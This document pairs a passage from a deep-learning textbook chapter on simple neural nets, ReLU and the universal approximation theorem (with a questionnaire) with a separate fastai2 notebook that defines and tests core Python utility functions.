Here, `w1` and `w2` are weight tensors, and `b1` and `b2` are bias tensors; that is, parameters that are initially randomly initialized, just like we did in the previous section: ``` w1 = init_params((28*28,30)) b1 = init_params(30) w2 = init_params((30,1)) b2 = init_params(1) ``` The key point about this is that `w1` has 30 output activations (which means that `w2` must have 30 input activations, so they match). That means that the first layer can construct 30 different features, each representing some different mix of pixels. You can change that `30` to anything you like, to make the model more or less complex. That little function `res.max(tensor(0.0))` is called a *rectified linear unit*, also known as *ReLU*. We think we can all agree that *rectified linear unit* sounds pretty fancy and complicated... But actually, there's nothing more to it than `res.max(tensor(0.0))`—in other words, replace every negative number with a zero. This tiny function is also available in PyTorch as `F.relu`: ``` plot_function(F.relu) ``` > J: There is an enormous amount of jargon in deep learning, including terms like _rectified linear unit_. The vast vast majority of this jargon is no more complicated than can be implemented in a short line of code, as we saw in this example. The reality is that for academics to get their papers published they need to make them sound as impressive and sophisticated as possible. One of the ways that they do that is to introduce jargon. Unfortunately, this has the result that the field ends up becoming far more intimidating and difficult to get into than it should be. You do have to learn the jargon, because otherwise papers and tutorials are not going to mean much to you. But that doesn't mean you have to find the jargon intimidating. Just remember, when you come across a word or phrase that you haven't seen before, it will almost certainly turn out to be referring to a very simple concept. 
The basic idea is that by using more linear layers, we can have our model do more computation, and therefore model more complex functions. But there's no point just putting one linear layer directly after another one, because when we multiply things together and then add them up multiple times, that could be replaced by multiplying different things together and adding them up just once! That is to say, a series of any number of linear layers in a row can be replaced with a single linear layer with a different set of parameters. But if we put a nonlinear function between them, such as `max`, then this is no longer true. Now each linear layer is actually somewhat decoupled from the other ones, and can do its own useful work. The `max` function is particularly interesting, because it operates as a simple `if` statement. > S: Mathematically, we say the composition of two linear functions is another linear function. So, we can stack as many linear classifiers as we want on top of each other, and without nonlinear functions between them, it will just be the same as one linear classifier. Amazingly enough, it can be mathematically proven that this little function can solve any computable problem to an arbitrarily high level of accuracy, if you can find the right parameters for `w1` and `w2` and if you make these matrices big enough. For any arbitrarily wiggly function, we can approximate it as a bunch of lines joined together; to make it closer to the wiggly function, we just have to use shorter lines. This is known as the *universal approximation theorem*. The three lines of code that we have here are known as *layers*. The first and third are known as *linear layers*, and the second line of code is known variously as a *nonlinearity*, or *activation function*. 
Just like in the previous section, we can replace this code with something a bit simpler, by taking advantage of PyTorch: ``` simple_net = nn.Sequential( nn.Linear(28*28,30), nn.ReLU(), nn.Linear(30,1) ) ``` `nn.Sequential` creates a module that will call each of the listed layers or functions in turn. `nn.ReLU` is a PyTorch module that does exactly the same thing as the `F.relu` function. Most functions that can appear in a model also have identical forms that are modules. Generally, it's just a case of replacing `F` with `nn` and changing the capitalization. When using `nn.Sequential`, PyTorch requires us to use the module version. Since modules are classes, we have to instantiate them, which is why you see `nn.ReLU()` in this example. Because `nn.Sequential` is a module, we can get its parameters, which will return a list of all the parameters of all the modules it contains. Let's try it out! As this is a deeper model, we'll use a lower learning rate and a few more epochs. ``` learn = Learner(dls, simple_net, opt_func=SGD, loss_func=mnist_loss, metrics=batch_accuracy) #hide_output learn.fit(40, 0.1) ``` We're not showing the 40 lines of output here to save room; the training process is recorded in `learn.recorder`, with the table of output stored in the `values` attribute, so we can plot the accuracy over training as: ``` plt.plot(L(learn.recorder.values).itemgot(2)); ``` And we can view the final accuracy: ``` learn.recorder.values[-1][2] ``` At this point we have something that is rather magical: 1. A function that can solve any problem to any level of accuracy (the neural network) given the correct set of parameters 1. A way to find the best set of parameters for any function (stochastic gradient descent) This is why deep learning can do things which seem rather magical—such fantastic things. Believing that this combination of simple techniques can really solve any problem is one of the biggest steps that we find many students have to take. 
It seems too good to be true—surely things should be more difficult and complicated than this? Our recommendation: try it out! We just tried it on the MNIST dataset and you have seen the results. And since we are doing everything from scratch ourselves (except for calculating the gradients) you know that there is no special magic hiding behind the scenes. ### Going Deeper There is no need to stop at just two linear layers. We can add as many as we want, as long as we add a nonlinearity between each pair of linear layers. As you will learn, however, the deeper the model gets, the harder it is to optimize the parameters in practice. Later in this book you will learn about some simple but brilliantly effective techniques for training deeper models. We already know that a single nonlinearity with two linear layers is enough to approximate any function. So why would we use deeper models? The reason is performance. With a deeper model (that is, one with more layers) we do not need to use as many parameters; it turns out that we can use smaller matrices with more layers, and get better results than we would get with larger matrices, and few layers. That means that we can train the model more quickly, and it will take up less memory. In the 1990s researchers were so focused on the universal approximation theorem that very few were experimenting with more than one nonlinearity. This theoretical but not practical foundation held back the field for years. Some researchers, however, did experiment with deep models, and eventually were able to show that these models could perform much better in practice. Eventually, theoretical results were developed which showed why this happens. Today, it is extremely unusual to find anybody using a neural network with just one nonlinearity. 
Here is what happens when we train an 18-layer model using the same approach we saw in <<chapter_intro>>: ``` dls = ImageDataLoaders.from_folder(path) learn = cnn_learner(dls, resnet18, pretrained=False, loss_func=F.cross_entropy, metrics=accuracy) learn.fit_one_cycle(1, 0.1) ``` Nearly 100% accuracy! That's a big difference compared to our simple neural net. But as you'll learn in the remainder of this book, there are just a few little tricks you need to use to get such great results from scratch yourself. You already know the key foundational pieces. (Of course, even once you know all the tricks, you'll nearly always want to work with the pre-built classes provided by PyTorch and fastai, because they save you having to think about all the little details yourself.) ## Jargon Recap Congratulations: you now know how to create and train a deep neural network from scratch! We've gone through quite a few steps to get to this point, but you might be surprised at how simple it really is. Now that we are at this point, it is a good opportunity to define, and review, some jargon and key concepts. A neural network contains a lot of numbers, but they are only of two types: numbers that are calculated, and the parameters that these numbers are calculated from. This gives us the two most important pieces of jargon to learn: - Activations:: Numbers that are calculated (both by linear and nonlinear layers) - Parameters:: Numbers that are randomly initialized, and optimized (that is, the numbers that define the model) We will often talk in this book about activations and parameters. Remember that they have very specific meanings. They are numbers. They are not abstract concepts, but they are actual specific numbers that are in your model. Part of becoming a good deep learning practitioner is getting used to the idea of actually looking at your activations and parameters, and plotting them and testing whether they are behaving correctly. 
Our activations and parameters are all contained in *tensors*. These are simply regularly shaped arrays—for example, a matrix. Matrices have rows and columns; we call these the *axes* or *dimensions*. The number of dimensions of a tensor is its *rank*. There are some special tensors: - Rank zero: scalar - Rank one: vector - Rank two: matrix A neural network contains a number of layers. Each layer is either *linear* or *nonlinear*. We generally alternate between these two kinds of layers in a neural network. Sometimes people refer to both a linear layer and its subsequent nonlinearity together as a single layer. Yes, this is confusing. Sometimes a nonlinearity is referred to as an *activation function*. <<dljargon1>> summarizes the key concepts related to SGD. ```asciidoc [[dljargon1]] .Deep learning vocabulary [options="header"] |===== | Term | Meaning |ReLU | Function that returns 0 for negative numbers and doesn't change positive numbers. |Mini-batch | A small group of inputs and labels gathered together in two arrays. A gradient descent step is updated on this batch (rather than a whole epoch). |Forward pass | Applying the model to some input and computing the predictions. |Loss | A value that represents how well (or badly) our model is doing. |Gradient | The derivative of the loss with respect to some parameter of the model. |Backward pass | Computing the gradients of the loss with respect to all model parameters. |Gradient descent | Taking a step in the directions opposite to the gradients to make the model parameters a little bit better. |Learning rate | The size of the step we take when applying SGD to update the parameters of the model. |===== ``` > note: _Choose Your Own Adventure_ Reminder: Did you choose to skip over chapters 2 & 3, in your excitement to peek under the hood? Well, here's your reminder to head back to chapter 2 now, because you'll be needing to know that stuff very soon! ## Questionnaire 1. 
How is a grayscale image represented on a computer? How about a color image? 1. How are the files and folders in the `MNIST_SAMPLE` dataset structured? Why? 1. Explain how the "pixel similarity" approach to classifying digits works. 1. What is a list comprehension? Create one now that selects odd numbers from a list and doubles them. 1. What is a "rank-3 tensor"? 1. What is the difference between tensor rank and shape? How do you get the rank from the shape? 1. What are RMSE and L1 norm? 1. How can you apply a calculation on thousands of numbers at once, many thousands of times faster than a Python loop? 1. Create a 3×3 tensor or array containing the numbers from 1 to 9. Double it. Select the bottom-right four numbers. 1. What is broadcasting? 1. Are metrics generally calculated using the training set, or the validation set? Why? 1. What is SGD? 1. Why does SGD use mini-batches? 1. What are the seven steps in SGD for machine learning? 1. How do we initialize the weights in a model? 1. What is "loss"? 1. Why can't we always use a high learning rate? 1. What is a "gradient"? 1. Do you need to know how to calculate gradients yourself? 1. Why can't we use accuracy as a loss function? 1. Draw the sigmoid function. What is special about its shape? 1. What is the difference between a loss function and a metric? 1. What is the function to calculate new weights using a learning rate? 1. What does the `DataLoader` class do? 1. Write pseudocode showing the basic steps taken in each epoch for SGD. 1. Create a function that, if passed two arguments `[1,2,3,4]` and `'abcd'`, returns `[(1, 'a'), (2, 'b'), (3, 'c'), (4, 'd')]`. What is special about that output data structure? 1. What does `view` do in PyTorch? 1. What are the "bias" parameters in a neural network? Why do we need them? 1. What does the `@` operator do in Python? 1. What does the `backward` method do? 1. Why do we have to zero the gradients? 1. What information do we have to pass to `Learner`? 1. 
Show Python or pseudocode for the basic steps of a training loop. 1. What is "ReLU"? Draw a plot of it for values from `-2` to `+2`. 1. What is an "activation function"? 1. What's the difference between `F.relu` and `nn.ReLU`? 1. The universal approximation theorem shows that any function can be approximated as closely as needed using just one nonlinearity. So why do we normally use more? ### Further Research 1. Create your own implementation of `Learner` from scratch, based on the training loop shown in this chapter. 1. Complete all the steps in this chapter using the full MNIST datasets (that is, for all digits, not just 3s and 7s). This is a significant project and will take you quite a bit of time to complete! You'll need to do some of your own research to figure out how to overcome some obstacles you'll meet on the way.
github_jupyter
``` #default_exp core.utils #export from fastai2.test import * from fastai2.core.foundation import * from fastai2.core.imports import * from nbdev.showdoc import * from PIL import Image import torch ``` # Utility functions > Utility functions used in the fastai library ## Basics ``` # export def ifnone(a, b): "`b` if `a` is None else `a`" return b if a is None else a ``` Since `b if a is None else a` is such a common pattern, we wrap it in a function. However, be careful, because python will evaluate *both* `a` and `b` when calling `ifnone` (which it doesn't do if using the `if` version directly). ``` test_eq(ifnone(None,1), 1) test_eq(ifnone(2 ,1), 2) #export def get_class(nm, *fld_names, sup=None, doc=None, funcs=None, **flds): "Dynamically create a class, optionally inheriting from `sup`, containing `fld_names`" attrs = {} for f in fld_names: attrs[f] = None for f in L(funcs): attrs[f.__name__] = f for k,v in flds.items(): attrs[k] = v sup = ifnone(sup, ()) if not isinstance(sup, tuple): sup=(sup,) def _init(self, *args, **kwargs): for i,v in enumerate(args): setattr(self, list(attrs.keys())[i], v) for k,v in kwargs.items(): setattr(self,k,v) def _repr(self): return '\n'.join(f'{o}: {getattr(self,o)}' for o in set(dir(self)) if not o.startswith('_') and not isinstance(getattr(self,o), types.MethodType)) if not sup: attrs['__repr__'] = _repr attrs['__init__'] = _init res = type(nm, sup, attrs) if doc is not None: res.__doc__ = doc return res _t = get_class('_t', 'a', b=2) t = _t() test_eq(t.a, None) test_eq(t.b, 2) t = _t(1, b=3) test_eq(t.a, 1) test_eq(t.b, 3) t = _t(1, 3) test_eq(t.a, 1) test_eq(t.b, 3) ``` Most often you'll want to call `mk_class`, since it adds the class to your module. See `mk_class` for more details and examples of use (which also apply to `get_class`). 
``` #export def mk_class(nm, *fld_names, sup=None, doc=None, funcs=None, mod=None, **flds): "Create a class using `get_class` and add to the caller's module" if mod is None: mod = inspect.currentframe().f_back.f_locals res = get_class(nm, *fld_names, sup=sup, doc=doc, funcs=funcs, **flds) mod[nm] = res ``` Any `kwargs` will be added as class attributes, and `sup` is an optional (tuple of) base classes. ``` mk_class('_t', a=1, sup=GetAttr) t = _t() test_eq(t.a, 1) assert(isinstance(t,GetAttr)) ``` A `__init__` is provided that sets attrs for any `kwargs`, and for any `args` (matching by position to fields), along with a `__repr__` which prints all attrs. The docstring is set to `doc`. You can pass `funcs` which will be added as attrs with the function names. ``` def foo(self): return 1 mk_class('_t', 'a', sup=GetAttr, doc='test doc', funcs=foo) t = _t(3, b=2) test_eq(t.a, 3) test_eq(t.b, 2) test_eq(t.foo(), 1) test_eq(t.__doc__, 'test doc') t #export def wrap_class(nm, *fld_names, sup=None, doc=None, funcs=None, **flds): "Decorator: makes function a method of a new class `nm` passing parameters to `mk_class`" def _inner(f): mk_class(nm, *fld_names, sup=sup, doc=doc, funcs=L(funcs)+f, mod=f.__globals__, **flds) return f return _inner @wrap_class('_t', a=2) def bar(self,x): return x+1 t = _t() test_eq(t.a, 2) test_eq(t.bar(3), 4) show_doc(noop) noop() test_eq(noop(1),1) show_doc(noops) mk_class('_t', foo=noops) test_eq(_t().foo(1),1) #export def store_attr(self, nms): "Store params named in comma-separated `nms` from calling context into attrs in `self`" mod = inspect.currentframe().f_back.f_locals for n in re.split(', *', nms): setattr(self,n,mod[n]) class T: def __init__(self, a,b,c): store_attr(self, 'a,b, c') t = T(1,c=2,b=3) assert t.a==1 and t.b==3 and t.c==2 #export def attrdict(o, *ks): "Dict from each `k` in `ks` to `getattr(o,k)`" return {k:getattr(o,k) for k in ks} test_eq(attrdict(t,'b','c'), {'b':3, 'c':2}) #export def properties(cls, *ps): "Change attrs 
in `cls` with names in `ps` to properties" for p in ps: setattr(cls,p,property(getattr(cls,p))) class T: def a(self): return 1 def b(self): return 2 properties(T,'a') test_eq(T().a,1) test_eq(T().b(),2) #export _camel_re1 = re.compile('(.)([A-Z][a-z]+)') _camel_re2 = re.compile('([a-z0-9])([A-Z])') #export def camel2snake(name): "Convert CamelCase to snake_case" s1 = re.sub(_camel_re1, r'\1_\2', name) return re.sub(_camel_re2, r'\1_\2', s1).lower() test_eq(camel2snake('ClassAreCamel'), 'class_are_camel') #export def snake2camel(s): "Convert snake_case to CamelCase" return ''.join(s.title().split('_')) test_eq(snake2camel('a_b_cc'), 'ABCc') #export def class2attr(self, cls_name): return camel2snake(re.sub(rf'{cls_name}$', '', self.__class__.__name__) or cls_name.lower()) #export def hasattrs(o,attrs): for attr in attrs: if not hasattr(o,attr): return False return True assert hasattrs(1,('imag','real')) assert not hasattrs(1,('imag','foo')) ``` ## Collection functions ``` #export def tuplify(o, use_list=False, match=None): "Make `o` a tuple" return tuple(L(o, use_list=use_list, match=match)) test_eq(tuplify(None),()) test_eq(tuplify([1,2,3]),(1,2,3)) test_eq(tuplify(1,match=[1,2,3]),(1,1,1)) #export def detuplify(x): "If `x` is a tuple with one thing, extract it" return None if len(x)==0 else x[0] if len(x)==1 and getattr(x, 'ndim', 1)==1 else x test_eq(detuplify(()),None) test_eq(detuplify([1]),1) test_eq(detuplify([1,2]), [1,2]) test_eq(detuplify(np.array([[1,2]])), np.array([[1,2]])) #export def replicate(item,match): "Create tuple of `item` copied `len(match)` times" return (item,)*len(match) t = [1,1] test_eq(replicate([1,2], t),([1,2],[1,2])) test_eq(replicate(1, t),(1,1)) #export def uniqueify(x, sort=False, bidir=False, start=None): "Return the unique elements in `x`, optionally `sort`-ed, optionally return the reverse correspondence." 
res = L(x).unique() if start is not None: res = start+res if sort: res.sort() if bidir: return res, res.val2idx() return res # test test_eq(set(uniqueify([1,1,0,5,0,3])),{0,1,3,5}) test_eq(uniqueify([1,1,0,5,0,3], sort=True),[0,1,3,5]) v,o = uniqueify([1,1,0,5,0,3], bidir=True) test_eq(v,[1,0,5,3]) test_eq(o,{1:0, 0: 1, 5: 2, 3: 3}) v,o = uniqueify([1,1,0,5,0,3], sort=True, bidir=True) test_eq(v,[0,1,3,5]) test_eq(o,{0:0, 1: 1, 3: 2, 5: 3}) # export def setify(o): return o if isinstance(o,set) else set(L(o)) # test test_eq(setify(None),set()) test_eq(setify('abc'),{'abc'}) test_eq(setify([1,2,2]),{1,2}) test_eq(setify(range(0,3)),{0,1,2}) test_eq(setify({1,2}),{1,2}) #export def merge(*ds): "Merge all dictionaries in `ds`" return {k:v for d in ds if d is not None for k,v in d.items()} test_eq(merge(), {}) test_eq(merge(dict(a=1,b=2)), dict(a=1,b=2)) test_eq(merge(dict(a=1,b=2), dict(b=3,c=4), None), dict(a=1, b=3, c=4)) #export def is_listy(x): "`isinstance(x, (tuple,list,L,slice,Generator))`" return isinstance(x, (tuple,list,L,slice,Generator)) assert is_listy([1]) assert is_listy(L([1])) assert is_listy(slice(2)) assert not is_listy(array([1])) #export def range_of(x): "All indices of collection `x` (i.e. `list(range(len(x)))`)" return list(range(len(x))) test_eq(range_of([1,1,1,1]), [0,1,2,3]) #export def groupby(x, key): "Like `itertools.groupby` but doesn't need to be sorted, and isn't lazy" res = {} for o in x: res.setdefault(key(o), []).append(o) return res test_eq(groupby('aa ab bb'.split(), itemgetter(0)), {'a':['aa','ab'], 'b':['bb']}) #export def first(x): "First element of `x`; i.e. 
a shortcut for `next(iter(x))`" return next(iter(x)) #export def shufflish(x, pct=0.04): "Randomly relocate items of `x` up to `pct` of `len(x)` from their starting location" n = len(x) return L(x[i] for i in sorted(range_of(x), key=lambda o: o+n*(1+random.random()*pct))) l = list(range(100)) l2 = array(shufflish(l)) test_close(l2[:50 ].mean(), 25, eps=5) test_close(l2[-50:].mean(), 75, eps=5) test_ne(l,l2) #export class IterLen: "Base class to add iteration to anything supporting `len` and `__getitem__`" def __iter__(self): return (self[i] for i in range_of(self)) #export @docs class ReindexCollection(GetAttr, IterLen): "Reindexes collection `coll` with indices `idxs` and optional LRU cache of size `cache`" _default='coll' def __init__(self, coll, idxs=None, cache=None): self.coll,self.idxs,self.cache = coll,ifnone(idxs,L.range(coll)),cache def _get(self, i): return self.coll[i] self._get = types.MethodType(_get,self) if cache is not None: self._get = functools.lru_cache(maxsize=cache)(self._get) def __getitem__(self, i): return self._get(self.idxs[i]) def __len__(self): return len(self.coll) def reindex(self, idxs): self.idxs = idxs def shuffle(self): random.shuffle(self.idxs) def cache_clear(self): self._get.cache_clear() _docs = dict(reindex="Replace `self.idxs` with idxs", shuffle="Randomly shuffle indices", cache_clear="Clear LRU cache") sz = 50 t = ReindexCollection(L.range(sz), cache=2) test_eq(list(t), range(sz)) test_eq(t[sz-1], sz-1) test_eq(t._get.cache_info().hits, 1) t.shuffle() test_eq(t._get.cache_info().hits, 1) test_ne(list(t), range(sz)) test_eq(set(t), set(range(sz))) t.cache_clear() test_eq(t._get.cache_info().hits, 0) test_eq(t.count(0), 1) #export def _oper(op,a,b=np.nan): return (lambda o:op(o,a)) if b!=b else op(a,b) def _mk_op(nm, mod=None): "Create an operator using `oper` and add to the caller's module" if mod is None: mod = inspect.currentframe().f_back.f_locals op = getattr(operator,nm) def _inner(a,b=np.nan): return _oper(op, a,b) 
_inner.__name__ = _inner.__qualname__ = nm _inner.__doc__ = f'Same as `operator.{nm}`, or returns partial if 1 arg' mod[nm] = _inner #export _all_ = ['lt','gt','le','ge','eq','ne','add','sub','mul','truediv','is_','is_not'] #export for op in ['lt','gt','le','ge','eq','ne','add','sub','mul','truediv','is_','is_not']: _mk_op(op) ``` The following functions are provided matching the behavior of the equivalent versions in `operator`: - *lt gt le ge eq ne add sub mul truediv* ``` lt(3,5),gt(3,5),is_(None,None) ``` However, they also have additional functionality: if you only pass one param, they return a partial function that passes that param as the second positional parameter. ``` lt(5)(3),gt(5)(3),is_(None)(None) #export class _InfMeta(type): @property def count(self): return itertools.count() @property def zeros(self): return itertools.cycle([0]) @property def ones(self): return itertools.cycle([1]) @property def nones(self): return itertools.cycle([None]) #export class Inf(metaclass=_InfMeta): "Infinite lists" pass ``` `Inf` defines the following properties: - `count: itertools.count()` - `zeros: itertools.cycle([0])` - `ones : itertools.cycle([1])` - `nones: itertools.cycle([None])` ``` test_eq([o for i,o in zip(range(5), Inf.count)], [0, 1, 2, 3, 4]) test_eq([o for i,o in zip(range(5), Inf.zeros)], [0, 0, 0, 0, 0]) #export def true(*args, **kwargs): "Predicate: always `True`" return True #export def stop(e=StopIteration): "Raises exception `e` (by default `StopIteration`) even if in an expression" raise e #export def gen(func, seq, cond=true): "Like `(func(o) for o in seq if cond(func(o)))` but handles `StopIteration`" return itertools.takewhile(cond, map(func,seq)) test_eq(gen(noop, Inf.count, lt(5)), range(5)) test_eq(gen(operator.neg, Inf.count, gt(-5)), [0,-1,-2,-3,-4]) test_eq(gen(lambda o:o if o<5 else stop(), Inf.count), range(5)) #export def chunked(it, cs, drop_last=False): if not isinstance(it, Iterator): it = iter(it) while True: res = 
list(itertools.islice(it, cs)) if res and (len(res)==cs or not drop_last): yield res if len(res)<cs: return t = L.range(10) test_eq(chunked(t,3), [[0,1,2], [3,4,5], [6,7,8], [9]]) test_eq(chunked(t,3,True), [[0,1,2], [3,4,5], [6,7,8], ]) t = map(lambda o:stop() if o==6 else o, Inf.count) test_eq(chunked(t,3), [[0, 1, 2], [3, 4, 5]]) t = map(lambda o:stop() if o==7 else o, Inf.count) test_eq(chunked(t,3), [[0, 1, 2], [3, 4, 5], [6]]) t = np.arange(10) test_eq(chunked(t,3), L([0,1,2], [3,4,5], [6,7,8], [9])) test_eq(chunked(t,3,True), L([0,1,2], [3,4,5], [6,7,8], )) #export def retain_type(new, old=None, typ=None): "Cast `new` to type of `old` or `typ` if it's a superclass" # e.g. old is TensorImage, new is Tensor - if not subclass then do nothing if new is None: return new assert old is not None or typ is not None if typ is None: if not isinstance(old, type(new)): return new typ = old if isinstance(old,type) else type(old) # Do nothing if the new type is already an instance of requested type (i.e. same type) return typ(new, **getattr(old, '_meta', {})) if typ!=NoneType and not isinstance(new, typ) else new class _T(tuple): pass a = _T((1,2)) b = tuple((1,2)) test_eq_type(retain_type(b, typ=_T), a) ``` If `old` has a `_meta` attribute, its content is passed when casting `new` to the type of `old`. 
``` class _A(): def __init__(self, t): self.t=t class _B1(_A): def __init__(self, t, a=1): super().__init__(t) self._meta = {'a': a} x = _B1(1, a=2) b = _A(1) test_eq(retain_type(b, old=x)._meta, {'a': 2}) #export def retain_types(new, old=None, typs=None): "Cast each item of `new` to type of matching item in `old` if it's a superclass" if not is_listy(new): return retain_type(new, old, typs) return type(new)(L(new, old, typs).map_zip(retain_type, cycled=True)) class T(tuple): pass t1,t2 = retain_types((1,(1,)), (2,T((2,)))) test_eq_type(t1, 1) test_eq_type(t2, T((1,))) #export @patch def split_arr(df:pd.DataFrame, from_col): "Split col `from_col` (containing arrays) in `DataFrame` `df` into separate columns" col = df[from_col] n = len(col.iloc[0]) cols = [f'{from_col}{o}' for o in range(n)] df[cols] = pd.DataFrame(df[from_col].values.tolist()) df.drop(columns=from_col, inplace=True) df = pd.DataFrame(dict(a=[[1,2,3],[4,5,6]])) df.split_arr('a') test_eq(df, pd.DataFrame(dict(a0=[1,4],a1=[2,5],a2=[3,6]))) ``` ## Simple types ``` #export def show_title(o, ax=None, ctx=None, label=None, color='black', **kwargs): "Set title of `ax` to `o`, or print `o` if `ax` is `None`" ax = ifnone(ax,ctx) if ax is None: print(o) elif hasattr(ax, 'set_title'): t = ax.title.get_text() if len(t) > 0: o = t+'\n'+str(o) ax.set_title(o, color=color) elif isinstance(ax, pd.Series): while label in ax: label += '_' ax = ax.append(pd.Series({label: o})) return ax test_stdout(lambda: show_title("title"), "title") # ensure that col names are unique when showing to a pandas series assert show_title("title", ctx=pd.Series(dict(a=1)), label='a').equals(pd.Series(dict(a=1,a_='title'))) #export class ShowTitle: "Base class that adds a simple `show`" _show_args = {'label': 'text'} def show(self, ctx=None, **kwargs): return show_title(str(self), ctx=ctx, **merge(self._show_args, kwargs)) class Int(int, ShowTitle): pass class Float(float, ShowTitle): pass class Str(str, ShowTitle): pass add_docs(Int, "An 
`int` with `show`"); add_docs(Str, "An `str` with `show`"); add_docs(Float, "An `float` with `show`") show_doc(Int, title_level=3) show_doc(Str, title_level=3) show_doc(Float, title_level=3) test_stdout(lambda: Str('s').show(), 's') test_stdout(lambda: Int(1).show(), '1') #export num_methods = """ __add__ __sub__ __mul__ __matmul__ __truediv__ __floordiv__ __mod__ __divmod__ __pow__ __lshift__ __rshift__ __and__ __xor__ __or__ __neg__ __pos__ __abs__ """.split() rnum_methods = """ __radd__ __rsub__ __rmul__ __rmatmul__ __rtruediv__ __rfloordiv__ __rmod__ __rdivmod__ __rpow__ __rlshift__ __rrshift__ __rand__ __rxor__ __ror__ """.split() inum_methods = """ __iadd__ __isub__ __imul__ __imatmul__ __itruediv__ __ifloordiv__ __imod__ __ipow__ __ilshift__ __irshift__ __iand__ __ixor__ __ior__ """.split() #export class Tuple(tuple): "A `tuple` with elementwise ops and more friendly __init__ behavior" def __new__(cls, x=None, *rest): if x is None: x = () if not isinstance(x,tuple): if len(rest): x = (x,) else: try: x = tuple(iter(x)) except TypeError: x = (x,) return super().__new__(cls, x+rest if rest else x) def _op(self,op,*args): if not isinstance(self,Tuple): self = Tuple(self) return type(self)(map(op,self,*map(cycle, args))) def mul(self,*args): "`*` is already defined in `tuple` for replicating, so use `mul` instead" return Tuple._op(self, operator.mul,*args) def add(self,*args): "`+` is already defined in `tuple` for concat, so use `add` instead" return Tuple._op(self, operator.add,*args) def _get_op(op): if isinstance(op,str): op = getattr(operator,op) def _f(self,*args): return self._op(op,*args) return _f for n in num_methods: if not hasattr(Tuple, n) and hasattr(operator,n): setattr(Tuple,n,_get_op(n)) for n in 'eq ne lt le gt ge'.split(): setattr(Tuple,n,_get_op(n)) setattr(Tuple,'__invert__',_get_op('__not__')) setattr(Tuple,'max',_get_op(max)) setattr(Tuple,'min',_get_op(min)) test_eq(Tuple(1), (1,)) test_eq(type(Tuple(1)), Tuple) test_eq_type(Tuple(1,2), 
Tuple(1,2)) test_ne(Tuple(1,2), Tuple(1,3)) test_eq(Tuple(), ()) test_eq(Tuple((1,2)), (1,2)) test_eq(-Tuple(1,2), (-1,-2)) test_eq(Tuple(1,1)-Tuple(2,2), (-1,-1)) test_eq(Tuple.add((1,1),(2,2)), (3,3)) test_eq(Tuple(1,1).add((2,2)), Tuple(3,3)) test_eq(Tuple('1','2').add('2'), Tuple('12','22')) test_eq_type(Tuple(1,1).add(2), Tuple(3,3)) test_eq_type(Tuple(1,1).mul(2), Tuple(2,2)) test_eq(Tuple(3,1).le(1), (False, True)) test_eq(Tuple(3,1).eq(1), (False, True)) test_eq(Tuple(3,1).gt(1), (True, False)) test_eq(Tuple(3,1).min(2), (2,1)) test_eq(~Tuple(1,0,1), (False,True,False)) #export class TupleTitled(Tuple, ShowTitle): "A `Tuple` with `show`" pass ``` ## Functions on functions ``` #export def trace(f): "Add `set_trace` to an existing function `f`" def _inner(*args,**kwargs): set_trace() return f(*args,**kwargs) return _inner # export def compose(*funcs, order=None): "Create a function that composes all functions in `funcs`, passing along remaining `*args` and `**kwargs` to all" funcs = L(funcs) if len(funcs)==0: return noop if len(funcs)==1: return funcs[0] if order is not None: funcs = funcs.sorted(order) def _inner(x, *args, **kwargs): for f in L(funcs): x = f(x, *args, **kwargs) return x return _inner f1 = lambda o,p=0: (o*2)+p f2 = lambda o,p=1: (o+1)/p test_eq(f2(f1(3)), compose(f1,f2)(3)) test_eq(f2(f1(3,p=3),p=3), compose(f1,f2)(3,p=3)) test_eq(f2(f1(3, 3), 3), compose(f1,f2)(3, 3)) f1.order = 1 test_eq(f1(f2(3)), compose(f1,f2, order="order")(3)) #export def maps(*args, retain=noop): "Like `map`, except funcs are composed first" f = compose(*args[:-1]) def _f(b): return retain(f(b), b) return map(_f, args[-1]) test_eq(maps([1]), [1]) test_eq(maps(operator.neg, [1,2]), [-1,-2]) test_eq(maps(operator.neg, operator.neg, [1,2]), [1,2]) test_eq_type(list(maps(operator.neg, [Tuple((1,)), 2], retain=retain_type)), [Tuple((-1,)), -2]) #export def partialler(f, *args, order=None, **kwargs): "Like `functools.partial` but also copies over docstring" fnew = 
partial(f,*args,**kwargs) fnew.__doc__ = f.__doc__ if order is not None: fnew.order=order elif hasattr(f,'order'): fnew.order=f.order return fnew def _f(x,a=1): "test func" return x+a _f.order=1 f = partialler(_f, a=2) test_eq(f.order, 1) f = partialler(_f, a=2, order=3) test_eq(f.__doc__, "test func") test_eq(f.order, 3) test_eq(f(3), _f(3,2)) #export def mapped(f, it): "map `f` over `it`, unless it's not listy, in which case return `f(it)`" return L(it).map(f) if is_listy(it) else f(it) test_eq(mapped(_f,1),2) test_eq(mapped(_f,[1,2]),[2,3]) test_eq(mapped(_f,(1,)),(2,)) #export def instantiate(t): "Instantiate `t` if it's a type, otherwise do nothing" return t() if isinstance(t, type) else t test_eq_type(instantiate(int), 0) test_eq_type(instantiate(1), 1) #export class _Self: "An alternative to `lambda` for calling methods on passed object." def __init__(self): self.nms,self.args,self.kwargs,self.ready = [],[],[],True def __repr__(self): return f'self: {self.nms}({self.args}, {self.kwargs})' def __call__(self, *args, **kwargs): if self.ready: x = args[0] for n,a,k in zip(self.nms,self.args,self.kwargs): x = getattr(x,n) if callable(x) and a is not None: x = x(*a, **k) return x else: self.args.append(args) self.kwargs.append(kwargs) self.ready = True return self def __getattr__(self,k): if not self.ready: self.args.append(None) self.kwargs.append(None) self.nms.append(k) self.ready = False return self class _SelfCls: def __getattr__(self,k): return getattr(_Self(),k) Self = _SelfCls() #export _all_ = ['Self'] ``` ### Self fastai provides a concise way to create lambdas that are calling methods on an object, which is to use `Self` (note the capitalization!) `Self.sum()`, for instance, is a shortcut for `lambda o: o.sum()`. ``` f = Self.sum() x = array([3.,1]) test_eq(f(x), 4.) # This is equivalent to above f = lambda o: o.sum() x = array([3.,1]) test_eq(f(x), 4.) 
